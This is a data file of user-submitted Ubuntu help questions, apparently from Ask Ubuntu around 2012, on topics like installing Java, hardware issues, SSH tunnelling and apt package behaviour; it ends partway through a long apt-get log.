119683	how to add a custom shape in the beginning of terminal command-prompt ?	i have seen a lot of terminal with sweet shape in the beginning of terminal command-prompt , like this : and i want to add a shape like this : ... ..____________________ , , __ ... ... / ` -- -___________ -- -- _____ ] - - - - - - - - ░ ▒▓▓█d ... ../_==o ; ; ; ; ; ; ; ; _______ . : / ... .. ) , -- - . ( _ ( __ ) / ... .// ( .. ) ) , -- -- '' ... //___// ..//___// .//___// i know how to change text color and add a character at the end , but when i add the brev shape it give me an error when i open the terminal : so how to do this ?
119694	monitoring system temperatures	i would like to know if there 's an indicator app that can show the system temperatures ( cpu , mb , hdd , etc. ) . i do have lm-sensors and hddtemp installed so that 's no problem , i just need to find a good indicator app . does anyone know any good one ?
119697	how to enable xmpp chat in empathy	since nimbuzz have no linux version i am using pidgin to chat with nimbuzz friends . pidgin can handle nimbuzz via xmpp protocol but now i want to do it via empathy .how to do it , edit : i tried jabber entry in the empathy , but it shows certificate error thanks in advance
119700	how do i update/install perl	the perl package is in /usr/bin and is an older version ( 5.12.4 ) and the current stable release appears to be 5.14.2 . how do i update this version ? root access is required , and i do not want to compile new binaries to install in a directory that is in my path
119701	why ca n't vlc see my webcam 's microphone ?	my goal is to stream my webcam over https . any recommendations beyond webcam-server and cvlc are welcome . from vlc , i can say media - > open capture device and leave the video 4 linux 2 capture mode selected . if i then select any of /dev/video0 /dev/v4l/by-path/pci-0000:00:1d.7-usb-0:2:1.0-video-index0 /dev/v4l/by-id/usb-dynex_dynex_1.3mp_webcam-video-index0 for a video source and press `` play '' , i see my video . if i try to include /dev/snd/by-id/usb-dynex_dynex_1.3mp_webcam-02 in the audio , i get the error your input ca n't be opened : vlc is unable to open the mrl 'alsa : ///dev/snd/by-id/usb-dynex_dynex_1.3mp_webcam-02 ' . check the log for details . using alternative versions of the microphone gives the same error . e.g . $ pwd /dev/snd/by-id $ ls usb-dynex_dynex_1.3mp_webcam-02 $ file usb\-dynex_dynex_1.3mp_webcam\-02 usb-dynex_dynex_1.3mp_webcam-02 : symbolic link to `../controlc1' suggests i should use /dev/snd/controlc1 , but that yields the same mrl ... alsa : /// error . also , i do n't see any log file in $ home/.local/share/vlc
119703	acer aspire one 722 touchpad too sensitive after upgrade	i just recently got an ao722 and installed ubuntu 11.10 . i was aware of some of the problems with the net-book so i set about tweaking things accordingly . i followed many of the instructions here ( specifically the net boot and graphics instructions ) : http : //bernaerts.dyndns.org/linux/202-ubuntu-acer-ao722 and here ( specifically the jupiter and power regression instructions ) : http : //ubuntuforums.org/showthread.php ? t=1811178 last night , while installing and going through an update/upgrade , i noticed there were a lot of packages being held back . included were the new linux kernal and a whole mess of xorg stuff so i did a sudo apt-get dist-upgrade . the kernal is 3.0.0-17-generic . after reboot , the touchpad behaved differently . it is much more sensitive and the pointer is much more difficult to control on the screen . adjusting the sensitivity and acceleration in system settings does not help so i think something was broken with my last upgrade . i 've been looking around on the internet and have found nothing about this problem . any ideas ?
119715	wireless keyboard +installation	i have a running win7 `` system '' with wireless keyboard and mouse . they are not running till windows is ready to start ( login screen ) . if i install ubuntu ( or any other system ) i will not be able to use this keyboard and mouse . could have a wired keyboard , but is there any obstacle or hint to use this way ?
119716	how can i have two scripted operations each have their own gnome-terminal ?	i have two scripted operations that take hours and both print to the console . i would like to avoid having their output interleaved because that looks a bit of a mess . how would i write a script that uses two consoles so that the output is not interleaved ? presently each of the two operations is a script , so for example script1.sh and script2.sh . each scripts runs a java program . presently i manually open two gnome-terminals and run the scripts separately . each uses the & to background the operation . ideally , there would be one script that opens two terminals . note that `` one script '' could actually be a parent script that invokes any number of , but probably 2 , child scripts .
119718	how do i make my existing ubuntu in a bootable installation cd ? i tried remastersys but fails with 11.10	i need to install 10 pc which has identical setup and hardware . so i was trying remastersys but its failing . how can i resolve this or use something else to achieve this ? updating the remastersys.log cat : /home/remastersys/remastersys/tmpusers : no such file or directory cleaning up the install icon from the user desktops removing the ubiquity frontend as it has been included and is not needed on the normal system calculating the installed filesystem size for the installer removing remastersys-firstboot from system startup removing any system startup links for /etc/init.d/remastersys-firstboot ... /etc/rc0.d/k20remastersys-firstboot /etc/rc1.d/k20remastersys-firstboot /etc/rc2.d/s20remastersys-firstboot /etc/rc3.d/s20remastersys-firstboot /etc/rc4.d/s20remastersys-firstboot /etc/rc5.d/s20remastersys-firstboot /etc/rc6.d/k20remastersys-firstboot making disk compatible with ubuntu startup disk creator . creating md5sum.txt for the livecd/dvd creating /var/tmp/custom.iso in /home/remastersys/remastersys the iso was not created . there was a problem . exiting follow up : method 1 : clonezilla way : 1 ) i am unhappy that there is nothing exist for this to recover/backup 11.10 2 ) anyway i have to do it 3 ) i did not used the popular clonezilla because it does not offer me iso 4 ) i downloaded : http : //clonezilla-sysresccd.hellug.gr/download.html a ) created a bootable cd from that iso b ) booted and followed those steps http : //clonezilla-sysresccd.hellug.gr/restore.html c ) i got a iso file with everyhing on it including boot-loaders 5 ) then in another system i used my same cd to restore my image
119720	unable to resolve host	when i enter a sudo command in to the terminal i get an error . just before it asks for a password it says : sudo : unable to resolve host harris-laptop i never had this problem before i changed my computer 's name . how can i stop the message showing ?
119722	how do i install java ?	first time ever using ubuntu and i 'm trying to learn it . i was wondering how do i install java . i downloaded `` jre-6u31-linux-i586-rpm.bin '' from the official java website . how do i install it ? i know it 's something too do with the terminal ? thanks guys . really appreciate it . i 'm a noob at this , but we all start somewhere .
119728	i can not update ubuntu 64 11.10 , have constant crashes	i ca n't seem to update , try via update manager & get this message : the package system is broken . if you are using third party repositories then disable them , since they are a common source of problems . now run the following command in a terminal : apt-get install -f the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.13-20ubuntu5 ) but 2.13-20ubuntu5.1 is installed libc6 : i386 : depends : libc-bin ( = 2.13-20ubuntu5 ) but 2.13-20ubuntu5.1 is installed when manually entering command apt-get install -f i get the below message : : ~ $ apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? ' i get loads of firefox crashes & now simply when copying a file from one folder to another the system crashes , seems to be degenerating - clearly i 'm not very techy ( do n't know what or where 3rd party repositories are or how to disable them.. ) need some help .
119730	does ubuntu 11.10 is support ns2.29	i need your help , i 'm a beginner on ns2 , and i 'm trying to install ns2.29 on ubuntu 11.10 32bits but i ca n't . this message appear and installation stopped : build tcl8.4.11 ============================================================ loading cache ./config.cache checking whether to use symlinks for manpages ... no checking whether to compress the manpages ... no checking whether to add a package name suffix for the manpages ... no checking for gcc ... gcc checking whether the c compiler ( gcc ) works ... yes checking whether the c compiler ( gcc ) is a cross-compiler ... no checking whether we are using gnu c ... yes checking whether gcc accepts -g ... yes checking for building with threads ... no ( default ) checking if the compiler understands -pipe ... yes checking how to run the c preprocessor ... gcc -pipe -e checking for sin ... no checking for main in -lieee ... yes checking for main in -linet ... no checking for net/errno.h ... no checking for connect ... yes checking for gethostbyname ... yes checking how to build libraries ... static checking for ranlib ... ranlib checking if 64bit support is requested ... no checking if 64bit sparc vis support is requested ... no checking system version ( for dynamic loading ) ... ./configure : 1 : syntax error : unterminated quoted string tcl8.3.2 configuration failed ! exiting ... tcl is not part of the ns project . please see www.scriptics.com to see if they have a fix for your platform . anyone can help me ?
119731	how do i disable the chameleon effect in notifications and the unity launcher ?	is there a way to stop the new unity feature that changes the colour of the launcher and notifications that matches them to the wallpaper ? its an interesting feature , but i would rather not have a yellow or brown launcher just because the wallpaper has some yellow or brown in the image , its pretty ugly .
119737	how to re-configure x for external display ( hdmi )	i recently re-installed ubuntu ( 11.04 ) was working fine until my laptop screen broke . i assumed it would be a simple task of plugging in an external monitor and everything would be fine , but i can not use tty7 , all others work fine , i can login to it and vim and nano stuff as i would normally , but i am unable to use my desktop . is there any way of re-configuring x ( i assume x is the problem , but i really have no idea ) so that it works over hdmi ? or even vga at this point ... edit : avoided fixing it with a new screen , but would still like to know how it can be done in the future
119740	having trouble installing java runtime environment on ubuntu 12.04	i digged up into the subject and it did n't really help . it actually made things worse . from what i understood from a website , jre has been discontinued on ubuntu for some reason . i find some tutorials for doing this , none of which has worked . i am trying to run minecraft on my os .
119742	ext4 jbd2 journaling active even on empty filesystem	i have been having several issues with my ext4 file-systems that seem to be due to jbd2 journaling . i made a related post here and am rephrasing it with the hope that someone may be able to help . for a minimal example , i start with an empty 8gb usb stick and use gparted to create one ext4 partition . the command used by gparted when creating the ext4 file system is : mkfs.ext4 -j -o extent -l datatraveler8gb /dev/sde1 i check the file-system with gparted : e2fsck -f -y -v /dev/sde1 and i mount it : sudo mount /dev/sde1 /media/test the disk is empty , but the journaling is very active on this disk ( /dev/sde1 ) . the other disks are ext4 ssds formatted similarly . a snapshot of iotop : % sudo iotop -opa total disk read : 0.00 b/s | total disk write : 2027.21 k/s pid prio user disk read disk write swapin io command 262 be/3 root 0.00 b 56.00 k 0.00 % 0.18 % [ jbd2/sda1-8 ] 29069 be/3 root 0.00 b 0.00 b 0.00 % 0.16 % [ jbd2/sde1-8 ] 891 be/3 root 0.00 b 4.00 k 0.00 % 0.03 % [ jbd2/sdc1-8 ] what is jbd2 doing with /dev/sde1 ? if i follow the same steps with a larger 2tb disk , iotop indicates this empty disk is constantly being written to by jbd2 at the rate of mb/s as soon as i mount it . on the other disks , which have the os and /home , i have tried to find if any files are being modified by processes to cause this behavior but could n't find any . i also moved many of the disk intensive process to use a tmpfs . and used noatime . i have another non-ssd hard disk on this machine , /dev/sdb , that is also ext4 but was not formatted by gparted ( given to me by a coworker ) . it does not appear in iotop . so i am assuming there an issue with gparted . any suggestions are appreciated . also any tips on how to modify existing partitions to fix the issue without having to start from scratch would be great . there are some posts related to jbd2 but they did n't help ( eg . here ) .
119743	remote ssh configuration problem	my basic problem is that i would like to launch graphical application ( eg firefox ) on a remote computer ( at work ) from my computer at home . the computer at work ( wpc ) is behind a firewall . so i 'm using ssh to remotely connect to it , in text mode . the actual configuration i use is the following : i have the linux pc at work wpc i have a network drive at home nwd i have my linux pc at home hpc on wpc , i launch `` ssh -r 23000 : localhost:22 user @ nwd `` when i am at home , i first connect from hpc to nwd via ssh : `` ssh user @ nwd '' , and then , from nwd to wpc via `` ssh -p 23000 localhost '' that is working perfectly , but there is no x server on the network drive ( nwd ) . so i can not cascade two ssh -x connection . thus , i was thinking that i may connect directly from hpc to the 23000 port of nwd ? like that ( from hpc ) `` ssh -x -p 23000 user @ nwd '' , but then i got a connection refused . the first question is do you think this could work ( without an x server on nwd ) ? and if yes , how do i configure the sshd on nwd to allow access on port 23000 to other computers than just itself ? hope it is not too confuse thanks for your help julien
119746	how to completely remove ubuntu ?	i installed ubuntu using wubi installer , but i couldnt boot to it . so i uninstalled it on the control panel . then i tried the full installation wherein it boots to the ubuntu environment . after installing ubuntu there , i couldnt boot to my windows 7 anymore ! so in an attempt to salvage the whole thing , i inserted the ubuntu cd again and chose erase ubuntu and reinstall . ( i was wondering , why was n't there an option to just `` erase ubuntu '' ? ) i did that though , and i got my windows 7 back . but upon checking my drives via the `` create your own partition scheme '' ( not sure if it 's the exact words ) i saw that one of my partitions still has ubuntu on it , and there 's no way i can delete it if i do n't overwrite another ubuntu ! i ca n't access that partition on windows 7 either ! need help !
119749	ubuntu usb expert install - grub2 installs on usb	i used unetbootin and installed the mini.iso over to my usb . i carried out the wizard installation steps and grub2 gets installed onto the usb stick instead of the hard drive . any ideas ?
119754	software location after installing via ubuntu software center	let me tell you my problem : i just move from windows 7 to ubuntu and i 'm trying to setup my programming environment . i installed eclipse via ubuntu software center , then opened it and installed additional plugins . problem came up when i tried to install subclipse : according to the official guide , i installed javahl , but that damned library was n't automatically linked by eclipse , so i was told to `` note that javahl does not install in a location that is on eclipse 's default path , so eclipse must be launched with -vmargs -djava.library.path=/usr/lib/jni '' . yes i know i have to modify eclipse.ini and add that vmargs line , but where is eclipse.ini ? ? ? i opened /usr/bin , the eclipse.exe is there but i ca n't found the rest . i really do n't want to remove this eclipse and download another from eclipse download page , because i will have to reinstall every plugins again . please can anyone tell me how to find the directory which contains software which installed via usc ? any help will be appreciated .
119761	headphone and built in speaker working together in ubuntu 12.04	if i connect my head phone to my laptop it does n't stop my laptop built in speaker . headphone works properly but at the same time laptop speakers also plays . it supposed to stop as soon as i connect my headphone to my laptop which is not happening . and when i will remove my headphone from my laptop the sound should immediately go to my laptop front speaker .
119774	resize window to half width	is there an easy / convenient way to resize any window on kubuntu to half width of the screen ? with todays wide screen monitors , i have enough space to fit two windows side by side , but i never do that because the maximize-button is so easy to click and i guess i 'm just too lazy to fiddle with the window width manually . is there something as a button that resizes my window on the left half of the monitor and a button to resize to the right half of the monitor ? now the catch is that i have a two monitor set up , which would imply i can potentially fit 2 windows on each of the two monitors . app that enables hotkeys to half-screen a window ? does n't work on kubuntu 11.04 11.10
119775	how to set the default microphone	i am using an external web-cam with a build-in microphone . when i am using skype or some other software it doesnât recognise the microphone automatically . so i always have to activate it myself in the audio settings . how can i avoid this and set it as default web-cam . this pc does n't have another webcam or mic . and the web-cam is always pluged in . ubuntu 12.04 beta with latest updates ( i also had this problems with 10.04 ) logitech , inc. web-cam b500
119776	how to change or add themes for unity ?	does anyone know how to change themes ? there only 4 themes , can we add more themes by download it , i try to download some themes that i like but there no option to install it , any idea .. how to add more themes ? cause i try google it need to change into gnome or something like that i just like keep unity with blackbuntu themes
119781	tried everything , ubuntu cd wo n't boot	after wubi did n't work ( error : prefix not found ) , i decided to perform a native ubuntu install . before that i changed and checked my bios already . first i downloaded an 11.10 iso from ubuntu.com and burnt a cd . did n't boot . then i bought a 11.04 cd from a bookstore . still did n't boot . next , i made a 10.04 usb drive . it booted and installed , but my computer shows grub rescue after the third bootup ! after 5 hours of restoring the windows bootloader , i borrowed the ubuntu 11.10 unleashed 2012 book from the local library . it came with the ubuntu 11.10 dvd edition cd . still did n't boot . then i booted into nomodset mode and it still did n't boot . the book was new ( according to the staff ) ! this is what happened all the time : after it shows the purple screen i chose english and chose to try ubuntu without installing . then a blank screen with a flashing line appears , sometimes with a `` prefix not found '' message . it kept flashing for an hour . what is the problem here ? any help will be appreciated ! specs : asus f81se , 4gb ram ; came with 2 gb , windows 7 home premium ; was going to dual-boot
119785	juju status ca n't resolve hostname	i 'm trying to install a private cloud with ubuntu server 11.10 . i 've successfully installed orchestra by following the below tutorial : http : //cloud.ubuntu.com/2011/09/oneiric-server-deploy-server-fleets-p1/ then i 've followed this tutorial to install and configure juju : https : //help.ubuntu.com/community/ubuntucloudinfrastructure the juju bootstrap command finished successful and by booting the machine it installed ubuntu server . when i then try to run the juju status command i get the following error : juju -v status 2012-04-07 19:52:54,385 debug initializing juju status runtime 2012-04-07 19:52:54,408 info connecting to environment . 2012-04-07 19:52:54,409 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' jujubootstrap '' remote_port= '' 2181 '' local_port= '' 35589 '' . can not connect to machine mtmzmzgymdy2os44mje5mzaznzkumza0mzg ( perhaps still initializing ) : could not connect before timeout after 1 retries 2012-04-07 19:53:24,520 error can not connect to machine mtmzmzgymdy2os44mje5mzaznzkumza0mzg ( perhaps still initializing ) : could not connect before timeout after 1 retries i guess there is a problem with resolving the hostname i 've set for the system in orchestra . i can ping the machine correctly by using its ip address . is there a way to configure juju to use ip addresses instead of hostnames ? or is this rather a bug in orchestra/juju and the default dhcp configuration set during the installation of orchestra ?
119786	how do i install ubuntu on a new partition ?	i am trying to install ubuntu on my current hard drive which currently contains two partitions , my windows partition ( sda2 , view image attached ) and a recovery partition ( sda2 ) . i want to create a new partition for ubuntu but it does not give me the option . the installer says `` this computer currently has multiple operating systems on it . what would you like to do ? '' and gives me two options : erase disk and install ubuntu or something else . should i create a new partition through windows ( and if so what format ) or the new partition table ( which would delete all current partitions ? help me i 'm lost ! i really love ubuntu and i want it on my computer .
119789	sudo apt-get remove [ software package ] removes [ software package ] but installs something else as well ?	i am using xubuntu 11.10 oneric on an old thinkpad . often , when i run sudo apt-get purge/remove [ software package ] , the requested software package , say , gnome-shell , is removed and replaced with what appears to be ubuntu-desktop and all it 's dependencies . i did n't read that it was installing anything so i just continued . the same thing happened when i removed chromium-browser , only to be replaced with epiphany . the terminal session is here ( with some parts removed due to body restrictions ) , and more evidence of this said bug also appears when i try to remove the wrongly installed unity package : marco @ thinkpad : ~ $ sudo apt-get purge gnome-shell ** ( parts removed ) ** the following packages were automatically installed and are no longer required : gir1.2-gstreamer-0.10 epiphany-browser-data libseed-gtk3-0 gnome-js-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : appmenu-gtk appmenu-gtk3 appmenu-qt bamfdaemon banshee banshee-extension-soundmenu brasero brasero-cdrkit brasero-common cli-common compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default compizconfig-backend-gconf dvd+rw-tools geoclue geoclue-ubuntu-geoip growisofs indicator-appmenu indicator-datetime indicator-power indicator-session libbamf3-0 libboost-serialization1.46.1 libbrasero-media3-1 libcompizconfig0 libdbus-glib1.0-cil libdbus1.0-cil libdbusmenu-qt2 libdecoration0 libgconf2.0-cil libgdata1.7-cil libgdiplus libgeoclue0 libgkeyfile1.0-cil libglew1.5 libglewmx1.5 libglib2.0-bin libglib2.0-cil libgmime-2.4-2 libgtk-sharp-beans-cil libgtk2.0-cil libgudev1.0-cil libmono-addins0.2-cil libmono-cairo4.0-cil libmono-corlib4.0-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-posix4.0-cil libmono-security4.0-cil libmono-sharpzip4.84-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil libmono-system-drawing4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libmono-zeroconf1.0-cil libmtp-common libmtp-runtime libmtp9 libnotify0.4-cil libnux-1.0-0 libnux-1.0-common libprotobuf7 libquvi0 libtaglib2.0-cil libtotem-plparser17 libunity-core-4.0-4 libunity-misc4 media-player-info mono-4.0-gac mono-gac mono-runtime nux-tools unity unity-asset-pool unity-common unity-lens-applications unity-lens-files unity-lens-music unity-scope-musicstores unity-services wodim zeitgeist-extension-fts suggested packages : gstreamer0.10-plugins-bad gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg banshee-extension-ubuntuonemusicstore banshee-dbg vcdimager libdvdcss2 dvdauthor readom compizconfig-settings-manager gnome-themes cdrskin gstreamer0.10-fluendo-mp3 cdrdao monodoc-gtk2.0-manual glew-utils1.5 libmono-i18n4.0-all cdrkit-doc the following packages will be removed gnome-shell* the following new packages will be installed appmenu-gtk appmenu-gtk3 appmenu-qt bamfdaemon banshee banshee-extension-soundmenu brasero brasero-cdrkit brasero-common cli-common compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default compizconfig-backend-gconf dvd+rw-tools geoclue geoclue-ubuntu-geoip growisofs indicator-appmenu indicator-datetime indicator-power indicator-session libbamf3-0 libboost-serialization1.46.1 libbrasero-media3-1 libcompizconfig0 libdbus-glib1.0-cil libdbus1.0-cil libdbusmenu-qt2 libdecoration0 libgconf2.0-cil libgdata1.7-cil libgdiplus libgeoclue0 libgkeyfile1.0-cil libglew1.5 libglewmx1.5 libglib2.0-bin libglib2.0-cil libgmime-2.4-2 libgtk-sharp-beans-cil libgtk2.0-cil libgudev1.0-cil libmono-addins0.2-cil libmono-cairo4.0-cil libmono-corlib4.0-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-posix4.0-cil libmono-security4.0-cil libmono-sharpzip4.84-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil libmono-system-drawing4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libmono-zeroconf1.0-cil libmtp-common libmtp-runtime libmtp9 libnotify0.4-cil libnux-1.0-0 libnux-1.0-common libprotobuf7 libquvi0 libtaglib2.0-cil libtotem-plparser17 libunity-core-4.0-4 libunity-misc4 media-player-info mono-4.0-gac mono-gac mono-runtime nux-tools unity unity-asset-pool unity-common unity-lens-applications unity-lens-files unity-lens-music unity-scope-musicstores unity-services wodim zeitgeist-extension-fts 0 upgraded , 87 newly installed , 1 to remove and 0 not upgraded . need to get 16.9 mb of archives . after this operation , 62.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ** ( parts removed ) ** fetched 16.9 mb in 3min 48s ( 74.0 kb/s ) extract templates from packages : 100 % selecting previously deselected package bamfdaemon . ( reading database ... 216368 files and directories currently installed . ) unpacking bamfdaemon ( from ... /bamfdaemon_0.2.104-0ubuntu1.1_i386.deb ) ... selecting previously deselected package libbamf3-0 . unpacking libbamf3-0 ( from ... /libbamf3-0_0.2.104-0ubuntu1.1_i386.deb ) ... selecting previously deselected package libglew1.5 . unpacking libglew1.5 ( from ... /libglew1.5_1.5.7.is.1.5.2-1ubuntu4_i386.deb ) ... selecting previously deselected package libnux-1.0-common . unpacking libnux-1.0-common ( from ... /libnux-1.0-common_1.16.0-0ubuntu1.1_all.deb ) ... selecting previously deselected package libglewmx1.5 . unpacking libglewmx1.5 ( from ... /libglewmx1.5_1.5.7.is.1.5.2-1ubuntu4_i386.deb ) ... selecting previously deselected package libnux-1.0-0 . unpacking libnux-1.0-0 ( from ... /libnux-1.0-0_1.16.0-0ubuntu1.1_i386.deb ) ... selecting previously deselected package unity-services . unpacking unity-services ( from ... /unity-services_4.28.0-0ubuntu2_i386.deb ) ... selecting previously deselected package libunity-core-4.0-4 . unpacking libunity-core-4.0-4 ( from ... /libunity-core-4.0-4_4.28.0-0ubuntu2_i386.deb ) ... selecting previously deselected package libunity-misc4 . unpacking libunity-misc4 ( from ... /libunity-misc4_4.0.4-0ubuntu2_i386.deb ) ... selecting previously deselected package unity-common . unpacking unity-common ( from ... /unity-common_4.28.0-0ubuntu2_all.deb ) ... selecting previously deselected package compiz-core . unpacking compiz-core ( from ... /compiz-core_1 % 3a0.9.6+bzr20110929-0ubuntu6.1_i386.deb ) ... selecting previously deselected package libdecoration0 . unpacking libdecoration0 ( from ... /libdecoration0_1 % 3a0.9.6+bzr20110929-0ubuntu6.1_i386.deb ) ... selecting previously deselected package compiz-plugins-default . unpacking compiz-plugins-default ( from ... /compiz-plugins-default_1 % 3a0.9.6+bzr20110929-0ubuntu6.1_i386.deb ) ... selecting previously deselected package libprotobuf7 . unpacking libprotobuf7 ( from ... /libprotobuf7_2.4.0a-2ubuntu2_i386.deb ) ... selecting previously deselected package libcompizconfig0 . unpacking libcompizconfig0 ( from ... /libcompizconfig0_0.9.5.94-0ubuntu2_i386.deb ) ... selecting previously deselected package compizconfig-backend-gconf . unpacking compizconfig-backend-gconf ( from ... /compizconfig-backend-gconf_0.9.5.92-0ubuntu2_i386.deb ) ... selecting previously deselected package compiz-gnome . unpacking compiz-gnome ( from ... /compiz-gnome_1 % 3a0.9.6+bzr20110929-0ubuntu6.1_i386.deb ) ... ^ [ [ a^ [ [ aselecting previously deselected package libboost-serialization1.46.1 . unpacking libboost-serialization1.46.1 ( from ... /libboost-serialization1.46.1_1.46.1-5ubuntu2_i386.deb ) ... selecting previously deselected package compiz-plugins-main-default . unpacking compiz-plugins-main-default ( from ... /compiz-plugins-main-default_1 % 3a0.9.6-0ubuntu4.2_i386.deb ) ... selecting previously deselected package compiz . unpacking compiz ( from ... /compiz_1 % 3a0.9.6+bzr20110929-0ubuntu6.1_all.deb ) ... selecting previously deselected package libglib2.0-bin . unpacking libglib2.0-bin ( from ... /libglib2.0-bin_2.30.0-0ubuntu4_i386.deb ) ... selecting previously deselected package nux-tools . unpacking nux-tools ( from ... /nux-tools_1.16.0-0ubuntu1.1_i386.deb ) ... selecting previously deselected package unity-asset-pool . unpacking unity-asset-pool ( from ... /unity-asset-pool_0.8.22-0ubuntu1_all.deb ) ... selecting previously deselected package unity . unpacking unity ( from ... /unity_4.28.0-0ubuntu2_i386.deb ) ... processing triggers for man-db ... processing triggers for libglib2.0-0 ... processing triggers for gconf2 ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... setting up bamfdaemon ( 0.2.104-0ubuntu1.1 ) ... rebuilding /usr/share/applications/bamf.index ... setting up libbamf3-0 ( 0.2.104-0ubuntu1.1 ) ... setting up libglew1.5 ( 1.5.7.is.1.5.2-1ubuntu4 ) ... setting up libnux-1.0-common ( 1.16.0-0ubuntu1.1 ) ... setting up libglewmx1.5 ( 1.5.7.is.1.5.2-1ubuntu4 ) ... setting up libnux-1.0-0 ( 1.16.0-0ubuntu1.1 ) ... setting up unity-services ( 4.28.0-0ubuntu2 ) ... setting up libunity-core-4.0-4 ( 4.28.0-0ubuntu2 ) ... setting up libunity-misc4 ( 4.0.4-0ubuntu2 ) ... setting up unity-common ( 4.28.0-0ubuntu2 ) ... setting up compiz-core ( 1:0.9.6+bzr20110929-0ubuntu6.1 ) ... setting up libdecoration0 ( 1:0.9.6+bzr20110929-0ubuntu6.1 ) ... setting up compiz-plugins-default ( 1:0.9.6+bzr20110929-0ubuntu6.1 ) ... setting up libprotobuf7 ( 2.4.0a-2ubuntu2 ) ... setting up libcompizconfig0 ( 0.9.5.94-0ubuntu2 ) ... setting up compizconfig-backend-gconf ( 0.9.5.92-0ubuntu2 ) ... setting up compiz-gnome ( 1:0.9.6+bzr20110929-0ubuntu6.1 ) ... setting up libboost-serialization1.46.1 ( 1.46.1-5ubuntu2 ) ... setting up compiz-plugins-main-default ( 1:0.9.6-0ubuntu4.2 ) ... setting up compiz ( 1:0.9.6+bzr20110929-0ubuntu6.1 ) ... setting up libglib2.0-bin ( 2.30.0-0ubuntu4 ) ... setting up nux-tools ( 1.16.0-0ubuntu1.1 ) ... setting up unity-asset-pool ( 0.8.22-0ubuntu1 ) ... setting up unity ( 4.28.0-0ubuntu2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place ( reading database ... 216937 files and directories currently installed . ) removing gnome-shell ... processing triggers for man-db ... processing triggers for libglib2.0-0 ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... selecting previously deselected package libdbusmenu-qt2 . ( reading database ... 216915 files and directories currently installed . ) unpacking libdbusmenu-qt2 ( from ... /libdbusmenu-qt2_0.9.0-0ubuntu2_i386.deb ) ... selecting previously deselected package libmtp-common . unpacking libmtp-common ( from ... /libmtp-common_1.1.0-3ubuntu1_all.deb ) ... selecting previously deselected package libmtp9 . unpacking libmtp9 ( from ... /libmtp9_1.1.0-3ubuntu1_i386.deb ) ... selecting previously deselected package appmenu-gtk . unpacking appmenu-gtk ( from ... /appmenu-gtk_0.3.0-0ubuntu1_i386.deb ) ... selecting previously deselected package appmenu-gtk3 . unpacking appmenu-gtk3 ( from ... /appmenu-gtk3_0.3.0-0ubuntu1_i386.deb ) ... selecting previously deselected package appmenu-qt . unpacking appmenu-qt ( from ... /appmenu-qt_0.2.2-0ubuntu1.1_i386.deb ) ... selecting previously deselected package libmono-corlib4.0-cil . unpacking libmono-corlib4.0-cil ( from ... /libmono-corlib4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-system-xml4.0-cil . unpacking libmono-system-xml4.0-cil ( from ... /libmono-system-xml4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-system-security4.0-cil . unpacking libmono-system-security4.0-cil ( from ... /libmono-system-security4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-system-configuration4.0-cil . unpacking libmono-system-configuration4.0-cil ( from ... /libmono-system-configuration4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-system4.0-cil . unpacking libmono-system4.0-cil ( from ... /libmono-system4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-security4.0-cil . unpacking libmono-security4.0-cil ( from ... /libmono-security4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package mono-4.0-gac . unpacking mono-4.0-gac ( from ... /mono-4.0-gac_2.10.5-1_all.deb ) ... selecting previously deselected package mono-gac . unpacking mono-gac ( from ... /mono-gac_2.10.5-1_all.deb ) ... selecting previously deselected package mono-runtime . unpacking mono-runtime ( from ... /mono-runtime_2.10.5-1_i386.deb ) ... selecting previously deselected package cli-common . unpacking cli-common ( from ... /cli-common_0.8~xamarin1_all.deb ) ... selecting previously deselected package libmono-posix4.0-cil . unpacking libmono-posix4.0-cil ( from ... /libmono-posix4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libmono-system-core4.0-cil . unpacking libmono-system-core4.0-cil ( from ... /libmono-system-core4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libdbus1.0-cil . unpacking libdbus1.0-cil ( from ... /libdbus1.0-cil_0.7.0-4_all.deb ) ... selecting previously deselected package libdbus-glib1.0-cil . unpacking libdbus-glib1.0-cil ( from ... /libdbus-glib1.0-cil_0.5.0-3build1_all.deb ) ... selecting previously deselected package libglib2.0-cil . unpacking libglib2.0-cil ( from ... /libglib2.0-cil_2.12.10-2ubuntu1_i386.deb ) ... selecting previously deselected package libgconf2.0-cil . unpacking libgconf2.0-cil ( from ... /libgconf2.0-cil_2.24.2-1_all.deb ) ... selecting previously deselected package libgdata1.7-cil . unpacking libgdata1.7-cil ( from ... /libgdata1.7-cil_1.7.0.1-1build1_all.deb ) ... selecting previously deselected package libgkeyfile1.0-cil . unpacking libgkeyfile1.0-cil ( from ... /libgkeyfile1.0-cil_0.1-2ubuntu2_all.deb ) ... selecting previously deselected package libmono-cairo4.0-cil . unpacking libmono-cairo4.0-cil ( from ... /libmono-cairo4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package libgdiplus . unpacking libgdiplus ( from ... /libgdiplus_2.10-2_i386.deb ) ... selecting previously deselected package libmono-system-drawing4.0-cil . unpacking libmono-system-drawing4.0-cil ( from ... /libmono-system-drawing4.0-cil_2.10.5-1_all.deb ) ... selecting previously deselected package 